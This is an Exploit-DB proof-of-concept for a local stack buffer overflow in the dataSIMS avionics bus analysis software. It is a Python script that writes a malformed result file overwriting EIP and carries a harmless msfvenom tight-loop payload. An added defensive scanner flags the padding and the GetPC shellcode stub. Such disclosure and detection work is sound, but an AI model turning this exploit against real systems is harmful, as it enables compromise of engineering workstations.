dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
Source: https://www.exploit-db.com/ Author: Kağan Çapar Published: 2021-02-20
# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author:  Kağan Çapar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# About the software:
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# About ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. 
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

# Crash PoC: writes a malformed result file which, when loaded by dataSIMS,
# overflows a stack buffer and overwrites EIP with 0x42424242.
# Register state at the crash, as captured in the debugger:

#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330     ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!

# Every segment is a bytes literal and the file is opened in binary mode, so the
# script produces the same 1040-byte file under Python 2 and Python 3.
out = open("milstd1553result.txt", "wb")

junk = b"\x41" * 600                                  # 600 x 'A': filler
align = b"\x32" * 4 + b"\x31" * 4                     # "2222" + "1111": 8 bytes
prop = b"\x43" * 380                                  # 380 x 'C': filler
imp = b"\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"     # "bzhrturlu2": 10 bytes
# "\x131" is parsed as \x13 followed by the character '1', so imp2 is 9 bytes.
# Kept exactly as in the original: the register dump above matches this layout.
imp2 = b"\x61\x72\x61\x63\x61\x67\x131\x7a"

# EIP overwrite value: "BBBB" (see EIP : 42424242 in the dump above)
overwrite = b"\x42" * 4

#Payload size: 29 bytes
#Final size of py file: 160 bytes

#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf =  b""
buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
buf += b"\x8b\x7c\x9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print(len(win32))   # 600 + 8 + 380 + 10 + 9 + 4 + 29 = 1040
out.write(win32)
out.close()
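From the defender's side, a result file built like the one above has two features that a pre-load check can flag before the analyser parses it: a very long run of a single byte (the padding that carries the overflow), and the fnstenv-based GetPC sequence (d9 74 24 f4) that x86/shikata_ga_nai-encoded stubs start with, visible here at the third byte of buf. The scanner below is an added example, not part of the original PoC or of the vendor's software; the run threshold of 256 bytes and the constructed sample inputs are assumptions chosen for illustration.

```python
#!/usr/bin/env python3
"""Heuristic scan of a dataSIMS-style result file for overflow payload traits.
Added example: flags long single-byte padding runs and the fnstenv GetPC idiom
used by shikata_ga_nai-encoded stubs. Not part of the original PoC."""

import sys

# fnstenv [esp-0xc]: the classic x86 GetPC idiom shikata_ga_nai decoders use
FNSTENV_GETPC = b"\xd9\x74\x24\xf4"


def longest_run(data: bytes):
    """Return (byte_value, run_length, start_offset) of the longest run of one byte.
    Returns (None, 0, 0) for empty input."""
    best = (None, 0, 0)
    i, n = 0, len(data)
    while i < n:
        j = i
        while j < n and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i, i)
        i = j
    return best


def scan(data: bytes, run_threshold: int = 256):
    """Return a report dict; 'findings' is empty when nothing suspicious is seen."""
    value, length, start = longest_run(data)
    findings = []
    if length >= run_threshold:
        findings.append("padding run of 0x%02x x %d at offset %d" % (value, length, start))
    getpc = data.find(FNSTENV_GETPC)
    if getpc != -1:
        findings.append("fnstenv GetPC stub at offset %d" % getpc)
    return {
        "size": len(data),
        "longest_run": (value, length, start),
        "getpc_offset": getpc,
        "findings": findings,
    }


# Constructed samples (not the PoC's bytes): one mimicking the overflow layout
# (600 x 'A', 400 x 'C', a 4-byte EIP marker, then a stub-like prefix followed by
# the GetPC idiom and filler), and one benign-looking text record.
SUSPICIOUS = (b"A" * 600 + b"C" * 400 + b"BBBB"
              + b"\xda\xc1" + FNSTENV_GETPC + b"\x90" * 23)
BENIGN = b"BC 01 RT 02 SA 03 0x1234 0x5678\n"


if __name__ == "__main__":
    # Usage: scan_result.py <file>; with no argument the constructed samples are used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            reports = [(sys.argv[1], scan(fh.read()))]
    else:
        reports = [("SUSPICIOUS", scan(SUSPICIOUS)), ("BENIGN", scan(BENIGN))]
    for name, rep in reports:
        print(name, rep["size"], "bytes:", rep["findings"] or "no findings")
```

The run-length check is deliberately crude: legitimate capture files can contain repeated fill bytes, so the threshold should be tuned against real exports from the tool, while the GetPC idiom is a much stronger signal because plain result data has no reason to contain it.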
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved